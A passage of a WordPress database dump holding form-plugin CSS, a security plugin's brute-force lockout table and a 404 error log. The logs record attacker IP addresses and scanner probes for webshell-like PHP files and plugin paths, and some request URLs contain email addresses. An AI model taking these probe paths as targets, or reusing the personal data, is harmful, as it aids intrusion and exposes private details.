0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #006C14;\r\n	cursor: pointer;\r\n	background-color: #7FB589;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #006C14;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #008118 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #008118 ), color-stop(67%, #089723 ), color-stop(100%, #069C22 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #008118 0%, #089723 67%, #069C22 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #008118 0%, #089723 67%, #069C22 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #7FB589;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #069B22;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #e4e4e4), color-stop(100%, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0%, #cccccc 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_formmaker_views`
--

CREATE TABLE IF NOT EXISTS `cyb_formmaker_views` (
  `form_id` int(11) NOT NULL,
  `views` int(50) NOT NULL,
  PRIMARY KEY (`form_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `cyb_formmaker_views`
--

INSERT INTO `cyb_formmaker_views` (`form_id`, `views`) VALUES
(10, 82);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_itsec_lockouts`
--

CREATE TABLE IF NOT EXISTS `cyb_itsec_lockouts` (
  `lockout_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `lockout_type` varchar(20) NOT NULL,
  `lockout_start` datetime NOT NULL,
  `lockout_start_gmt` datetime NOT NULL,
  `lockout_expire` datetime NOT NULL,
  `lockout_expire_gmt` datetime NOT NULL,
  `lockout_host` varchar(20) DEFAULT NULL,
  `lockout_user` bigint(20) unsigned DEFAULT NULL,
  `lockout_username` varchar(20) DEFAULT NULL,
  `lockout_active` int(1) NOT NULL DEFAULT '1',
  PRIMARY KEY (`lockout_id`),
  KEY `lockout_expire_gmt` (`lockout_expire_gmt`),
  KEY `lockout_host` (`lockout_host`),
  KEY `lockout_user` (`lockout_user`),
  KEY `lockout_username` (`lockout_username`),
  KEY `lockout_active` (`lockout_active`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1697 ;

--
-- Dumping data for table `cyb_itsec_lockouts`
--

INSERT INTO `cyb_itsec_lockouts` (`lockout_id`, `lockout_type`, `lockout_start`, `lockout_start_gmt`, `lockout_expire`, `lockout_expire_gmt`, `lockout_host`, `lockout_user`, `lockout_username`, `lockout_active`) VALUES
(1696, 'brute_force', '2018-05-03 22:16:14', '2018-05-04 03:16:14', '2018-05-03 22:31:14', '2018-05-04 03:31:14', '195.176.3.24', NULL, NULL, 1),
(1695, 'brute_force', '2018-05-03 16:17:02', '2018-05-03 21:17:02', '2018-05-03 16:32:02', '2018-05-03 21:32:02', '176.10.99.200', NULL, NULL, 1),
(1694, 'brute_force', '2018-05-03 08:07:44', '2018-05-03 13:07:44', '2018-05-03 08:22:44', '2018-05-03 13:22:44', '198.50.200.129', NULL, NULL, 1),
(1693, 'brute_force', '2018-05-02 22:54:33', '2018-05-03 03:54:33', '2018-05-02 23:09:33', '2018-05-03 04:09:33', '52.174.148.147', NULL, NULL, 1),
(1692, 'brute_force', '2018-05-02 19:46:42', '2018-05-03 00:46:42', '2018-05-02 20:01:42', '2018-05-03 01:01:42', '185.83.215.28', NULL, NULL, 1),
(1663, 'brute_force', '2018-04-25 07:06:34', '2018-04-25 12:06:34', '2018-04-25 07:21:34', '2018-04-25 12:21:34', '142.44.154.169', NULL, NULL, 1),
(1664, 'brute_force', '2018-04-25 11:13:01', '2018-04-25 16:13:01', '2018-04-25 11:28:01', '2018-04-25 16:28:01', '176.36.20.10', NULL, NULL, 1),
(1670, 'brute_force', '2018-04-27 16:33:04', '2018-04-27 21:33:04', '2018-04-27 16:48:04', '2018-04-27 21:48:04', '51.255.202.66', NULL, NULL, 1),
(1671, 'brute_force', '2018-04-28 12:27:40', '2018-04-28 17:27:40', '2018-04-28 12:42:40', '2018-04-28 17:42:40', '62.102.148.67', NULL, NULL, 1),
(1672, 'brute_force', '2018-04-28 13:41:20', '2018-04-28 18:41:20', '2018-04-28 13:56:20', '2018-04-28 18:56:20', '199.195.250.77', NULL, NULL, 1),
(1673, 'brute_force', '2018-04-28 13:50:04', '2018-04-28 18:50:04', '2018-04-28 14:05:04', '2018-04-28 19:05:04', '77.247.181.165', NULL, NULL, 1),
(1674, 'brute_force', '2018-04-28 13:52:00', '2018-04-28 18:52:00', '2018-04-28 14:07:00', '2018-04-28 19:07:00', '46.101.161.246', NULL, NULL, 1),
(1675, 'brute_force', '2018-04-29 10:19:33', '2018-04-29 15:19:33', '2018-04-29 10:34:33', '2018-04-29 15:34:33', '163.172.67.180', NULL, NULL, 1),
(1676, 'brute_force', '2018-04-29 10:19:34', '2018-04-29 15:19:34', '2018-04-29 10:34:34', '2018-04-29 15:34:34', '204.11.50.131', NULL, NULL, 1),
(1677, 'brute_force', '2018-04-29 15:30:11', '2018-04-29 20:30:11', '2018-04-29 15:45:11', '2018-04-29 20:45:11', '51.15.72.211', NULL, NULL, 1),
(1678, 'brute_force', '2018-04-30 03:55:33', '2018-04-30 08:55:33', '2018-04-30 04:10:33', '2018-04-30 09:10:33', '85.248.227.164', NULL, NULL, 1),
(1679, 'brute_force', '2018-04-30 04:52:16', '2018-04-30 09:52:16', '2018-04-30 05:07:16', '2018-04-30 10:07:16', '144.217.210.86', NULL, NULL, 1),
(1680, 'brute_force', '2018-04-30 06:35:46', '2018-04-30 11:35:46', '2018-04-30 06:50:46', '2018-04-30 11:50:46', '176.10.99.200', NULL, NULL, 1),
(1691, 'brute_force', '2018-05-02 07:15:11', '2018-05-02 12:15:11', '2018-05-02 07:30:11', '2018-05-02 12:30:11', '185.220.101.44', NULL, NULL, 1),
(1690, 'brute_force', '2018-05-02 07:08:04', '2018-05-02 12:08:04', '2018-05-02 07:23:04', '2018-05-02 12:23:04', '77.247.181.163', NULL, NULL, 1),
(1689, 'brute_force', '2018-05-02 06:09:41', '2018-05-02 11:09:41', '2018-05-02 06:24:41', '2018-05-02 11:24:41', '185.220.101.1', NULL, NULL, 1),
(1681, 'brute_force', '2018-04-30 19:26:11', '2018-05-01 00:26:11', '2018-04-30 19:41:11', '2018-05-01 00:41:11', '62.210.71.205', NULL, NULL, 1),
(1682, 'brute_force', '2018-04-30 19:31:19', '2018-05-01 00:31:19', '2018-04-30 19:46:19', '2018-05-01 00:46:19', '5.79.83.198', NULL, NULL, 1),
(1683, 'brute_force', '2018-05-01 02:48:17', '2018-05-01 07:48:17', '2018-05-01 03:03:17', '2018-05-01 08:03:17', '185.220.101.13', NULL, NULL, 1),
(1684, 'brute_force', '2018-05-01 05:43:11', '2018-05-01 10:43:11', '2018-05-01 05:58:11', '2018-05-01 10:58:11', '94.230.208.147', NULL, NULL, 1),
(1685, 'four_oh_four', '2018-05-01 08:01:08', '2018-05-01 13:01:08', '2018-05-01 08:16:08', '2018-05-01 13:16:08', '178.137.87.165', NULL, NULL, 1),
(1686, 'brute_force', '2018-05-01 23:12:08', '2018-05-02 04:12:08', '2018-05-01 23:27:08', '2018-05-02 04:27:08', '162.247.72.199', NULL, NULL, 1),
(1687, 'brute_force', '2018-05-01 23:54:32', '2018-05-02 04:54:32', '2018-05-02 00:09:32', '2018-05-02 05:09:32', '109.86.115.141', NULL, NULL, 1),
(1688, 'brute_force', '2018-05-02 06:09:25', '2018-05-02 11:09:25', '2018-05-02 06:24:25', '2018-05-02 11:24:25', '185.100.84.250', NULL, NULL, 1),
(1661, 'brute_force', '2018-04-24 22:00:55', '2018-04-25 03:00:55', '2018-04-24 22:15:55', '2018-04-25 03:15:55', '163.172.223.200', NULL, NULL, 1),
(1662, 'four_oh_four', '2018-04-25 06:55:29', '2018-04-25 11:55:29', '2018-04-25 07:10:29', '2018-04-25 12:10:29', '195.22.127.231', NULL, NULL, 1),
(1665, 'brute_force', '2018-04-25 21:00:52', '2018-04-26 02:00:52', '2018-04-25 21:15:52', '2018-04-26 02:15:52', '163.172.214.8', NULL, NULL, 1),
(1666, 'brute_force', '2018-04-26 19:00:09', '2018-04-27 00:00:09', '2018-04-26 19:15:09', '2018-04-27 00:15:09', '185.220.101.15', NULL, NULL, 1),
(1667, 'brute_force', '2018-04-26 20:50:51', '2018-04-27 01:50:51', '2018-04-26 21:05:51', '2018-04-27 02:05:51', '46.235.227.70', NULL, NULL, 1),
(1668, 'brute_force', '2018-04-26 21:41:08', '2018-04-27 02:41:08', '2018-04-26 21:56:08', '2018-04-27 02:56:08', '85.248.227.164', NULL, NULL, 1),
(1669, 'four_oh_four', '2018-04-27 00:21:34', '2018-04-27 05:21:34', '2018-04-27 00:36:34', '2018-04-27 05:36:34', '95.181.179.221', NULL, NULL, 1);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_itsec_log`
--

CREATE TABLE IF NOT EXISTS `cyb_itsec_log` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `log_type` varchar(20) NOT NULL DEFAULT '',
  `log_function` varchar(255) NOT NULL DEFAULT '',
  `log_priority` int(2) NOT NULL DEFAULT '1',
  `log_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `log_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `log_host` varchar(20) DEFAULT NULL,
  `log_username` varchar(20) DEFAULT NULL,
  `log_user` bigint(20) unsigned DEFAULT NULL,
  `log_url` varchar(255) DEFAULT NULL,
  `log_referrer` varchar(255) DEFAULT NULL,
  `log_data` longtext NOT NULL,
  PRIMARY KEY (`log_id`),
  KEY `log_type` (`log_type`),
  KEY `log_date_gmt` (`log_date_gmt`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=87170 ;

--
-- Dumping data for table `cyb_itsec_log`
--

INSERT INTO `cyb_itsec_log` (`log_id`, `log_type`, `log_function`, `log_priority`, `log_date`, `log_date_gmt`, `log_host`, `log_username`, `log_user`, `log_url`, `log_referrer`, `log_data`) VALUES
(85347, 'four_oh_four', '404 Error', 3, '2018-04-22 16:21:23', '2018-04-22 21:21:23', '77.88.5.31', '', 0, '/menlightenment/fSjZf/MfgXK/ZKUOT/VTVTX/PalSa/oUfSj/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85349, 'four_oh_four', '404 Error', 3, '2018-04-22 16:54:16', '2018-04-22 21:54:16', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85350, 'four_oh_four', '404 Error', 3, '2018-04-22 16:56:40', '2018-04-22 21:56:40', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85351, 'four_oh_four', '404 Error', 3, '2018-04-22 17:05:21', '2018-04-22 22:05:21', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85352, 'four_oh_four', '404 Error', 3, '2018-04-22 17:10:27', '2018-04-22 22:10:27', '193.106.30.99', '', 0, '/global-belief-relief/wp-includes/theme-compat/umos.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85353, 'four_oh_four', '404 Error', 3, '2018-04-22 17:14:08', '2018-04-22 22:14:08', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85354, 'four_oh_four', '404 Error', 3, '2018-04-22 17:14:58', '2018-04-22 22:14:58', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85355, 'four_oh_four', '404 Error', 3, '2018-04-22 17:15:00', '2018-04-22 22:15:00', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85356, 'four_oh_four', '404 Error', 3, '2018-04-22 17:16:48', '2018-04-22 22:16:48', '151.32.252.137', '', 0, '/wp-content/uploads/2014/03/CYB-8.pdf', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85357, 'four_oh_four', '404 Error', 3, '2018-04-22 17:26:59', '2018-04-22 22:26:59', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85358, 'four_oh_four', '404 Error', 3, '2018-04-22 17:34:02', '2018-04-22 22:34:02', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85359, 'four_oh_four', '404 Error', 3, '2018-04-22 18:04:05', '2018-04-22 23:04:05', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85360, 'four_oh_four', '404 Error', 3, '2018-04-22 18:25:03', '2018-04-22 23:25:03', '107.77.80.17', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85361, 'four_oh_four', '404 Error', 3, '2018-04-22 18:25:04', '2018-04-22 23:25:04', '107.77.80.17', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85362, 'four_oh_four', '404 Error', 3, '2018-04-22 18:25:08', '2018-04-22 23:25:08', '107.77.80.17', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85363, 'four_oh_four', '404 Error', 3, '2018-04-22 18:25:09', '2018-04-22 23:25:09', '107.77.80.17', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85364, 'four_oh_four', '404 Error', 3, '2018-04-22 18:25:16', '2018-04-22 23:25:16', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85365, 'four_oh_four', '404 Error', 3, '2018-04-22 18:40:54', '2018-04-22 23:40:54', '52.124.19.158', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85366, 'four_oh_four', '404 Error', 3, '2018-04-22 18:40:55', '2018-04-22 23:40:55', '52.124.19.158', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85367, 'four_oh_four', '404 Error', 3, '2018-04-22 19:33:38', '2018-04-23 00:33:38', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85368, 'four_oh_four', '404 Error', 3, '2018-04-22 19:53:22', '2018-04-23 00:53:22', '183.81.12.61', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85369, 'four_oh_four', '404 Error', 3, '2018-04-22 19:53:23', '2018-04-23 00:53:23', '183.81.12.61', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85370, 'four_oh_four', '404 Error', 3, '2018-04-22 20:04:32', '2018-04-23 01:04:32', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85371, 'four_oh_four', '404 Error', 3, '2018-04-22 20:14:46', '2018-04-23 01:14:46', '64.62.252.163', '', 0, '/who-we-are/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85372, 'four_oh_four', '404 Error', 3, '2018-04-22 20:15:49', '2018-04-23 01:15:49', '64.62.252.163', '', 0, '/who-we-are/www.ThrivingBusinessPartners.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85373, 'four_oh_four', '404 Error', 3, '2018-04-22 20:17:08', '2018-04-23 01:17:08', '64.62.252.163', '', 0, '/who-we-are/www.Vital-Ventures.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85374, 'four_oh_four', '404 Error', 3, '2018-04-22 20:18:20', '2018-04-23 01:18:20', '64.62.252.163', '', 0, '/who-we-are/howard@breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85375, 'four_oh_four', '404 Error', 3, '2018-04-22 20:18:36', '2018-04-23 01:18:36', '64.62.252.163', '', 0, '/who-we-are/www.breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85376, 'four_oh_four', '404 Error', 3, '2018-04-22 20:20:01', '2018-04-23 01:20:01', '64.62.252.163', '', 0, '/who-we-are/www.RadiantClarity.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85377, 'four_oh_four', '404 Error', 3, '2018-04-22 20:20:35', '2018-04-23 01:20:35', '64.62.252.163', '', 0, '/who-we-are/www.yoursedonacoach.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85378, 'four_oh_four', '404 Error', 3, '2018-04-22 20:26:07', '2018-04-23 01:26:07', '193.106.30.99', '', 0, '/wp-includes/ID3/comay.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85379, 'four_oh_four', '404 Error', 3, '2018-04-22 21:17:47', '2018-04-23 02:17:47', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85380, 'four_oh_four', '404 Error', 3, '2018-04-22 21:19:04', '2018-04-23 02:19:04', '218.91.115.15', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85381, 'four_oh_four', '404 Error', 3, '2018-04-22 21:23:46', '2018-04-23 02:23:46', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85382, 'four_oh_four', '404 Error', 3, '2018-04-22 21:29:33', '2018-04-23 02:29:33', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85383, 'four_oh_four', '404 Error', 3, '2018-04-22 21:34:05', '2018-04-23 02:34:05', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85384, 'four_oh_four', '404 Error', 3, '2018-04-22 22:08:00', '2018-04-23 03:08:00', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85385, 'four_oh_four', '404 Error', 3, '2018-04-22 22:18:45', '2018-04-23 03:18:45', '172.245.83.65', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85386, 'four_oh_four', '404 Error', 3, '2018-04-22 22:18:46', '2018-04-23 03:18:46', '172.245.83.65', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85387, 'four_oh_four', '404 Error', 3, '2018-04-22 22:23:31', '2018-04-23 03:23:31', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85388, 'four_oh_four', '404 Error', 3, '2018-04-22 23:11:30', '2018-04-23 04:11:30', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85389, 'four_oh_four', '404 Error', 3, '2018-04-22 23:38:34', '2018-04-23 04:38:34', '104.144.18.108', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(85390, 'four_oh_four', '404 Error', 3, '2018-04-22 23:39:05', '2018-04-23 04:39:05', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85391, 'four_oh_four', '404 Error', 3, '2018-04-22 23:42:45', '2018-04-23 04:42:45', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85392, 'four_oh_four', '404 Error', 3, '2018-04-22 23:46:46', '2018-04-23 04:46:46', '193.106.30.99', '', 0, '/wp-content/themes/porto/footer.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85393, 'four_oh_four', '404 Error', 3, '2018-04-22 23:54:02', '2018-04-23 04:54:02', '207.46.13.56', '', 0, '/certified-practitioners/2147483647/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85394, 'four_oh_four', '404 Error', 3, '2018-04-22 23:57:43', '2018-04-23 04:57:43', '207.46.13.56', '', 0, '/liongoodman-com/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85395, 'four_oh_four', '404 Error', 3, '2018-04-23 00:26:54', '2018-04-23 05:26:54', '40.77.167.107', '', 0, '/wp-content/uploads/2014/03/the-clear-your-beliefs-guidebook.pdf', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85396, 'four_oh_four', '404 Error', 3, '2018-04-23 00:28:05', '2018-04-23 05:28:05', '119.86.182.42', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85397, 'four_oh_four', '404 Error', 3, '2018-04-23 00:28:06', '2018-04-23 05:28:06', '119.86.182.42', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85398, 'four_oh_four', '404 Error', 3, '2018-04-23 00:28:16', '2018-04-23 05:28:16', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85399, 'four_oh_four', '404 Error', 3, '2018-04-23 00:31:01', '2018-04-23 05:31:01', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85400, 'four_oh_four', '404 Error', 3, '2018-04-23 00:43:27', '2018-04-23 05:43:27', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85401, 'four_oh_four', '404 Error', 3, '2018-04-23 01:15:11', '2018-04-23 06:15:11', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85402, 'four_oh_four', '404 Error', 3, '2018-04-23 01:24:19', '2018-04-23 06:24:19', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85403, 'four_oh_four', '404 Error', 3, '2018-04-23 01:25:48', '2018-04-23 06:25:48', '207.46.13.161', '', 0, '/certified-coaches/www.breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85404, 'four_oh_four', '404 Error', 3, '2018-04-23 01:48:06', '2018-04-23 06:48:06', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85405, 'four_oh_four', '404 Error', 3, '2018-04-23 02:40:03', '2018-04-23 07:40:03', '47.220.165.118', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85406, 'four_oh_four', '404 Error', 3, '2018-04-23 02:56:36', '2018-04-23 07:56:36', '193.106.30.99', '', 0, '/wp-content/themes/peekaboo/functions.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85407, 'four_oh_four', '404 Error', 3, '2018-04-23 03:13:41', '2018-04-23 08:13:41', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85408, 'four_oh_four', '404 Error', 3, '2018-04-23 03:25:40', '2018-04-23 08:25:40', '91.200.12.98', '', 0, '/wp-content/plugins/estatik/readme.txt', 'http://www.clearyourbeliefs.com/wp-content/plugins/estatik/readme.txt', 'a:1:{s:12:"query_string";s:0:"";}'),
(85409, 'four_oh_four', '404 Error', 3, '2018-04-23 03:25:43', '2018-04-23 08:25:43', '91.200.12.98', '', 0, '/wp-content/plugins/estatik/readme.txt', 'http://www.clearyourbeliefs.org/wp-content/plugins/estatik/readme.txt', 'a:1:{s:12:"query_string";s:0:"";}'),
(85410, 'four_oh_four', '404 Error', 3, '2018-04-23 03:32:12', '2018-04-23 08:32:12', '193.70.34.209', '', 0, '/update.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85411, 'four_oh_four', '404 Error', 3, '2018-04-23 04:01:26', '2018-04-23 09:01:26', '167.114.43.90', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85412, 'four_oh_four', '404 Error', 3, '2018-04-23 04:01:26', '2018-04-23 09:01:26', '167.114.43.90', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85413, 'four_oh_four', '404 Error', 3, '2018-04-23 04:08:13', '2018-04-23 09:08:13', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85414, 'four_oh_four', '404 Error', 3, '2018-04-23 04:45:24', '2018-04-23 09:45:24', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85415, 'four_oh_four', '404 Error', 3, '2018-04-23 05:44:55', '2018-04-23 10:44:55', '39.50.106.80', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85416, 'four_oh_four', '404 Error', 3, '2018-04-23 05:57:03', '2018-04-23 10:57:03', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
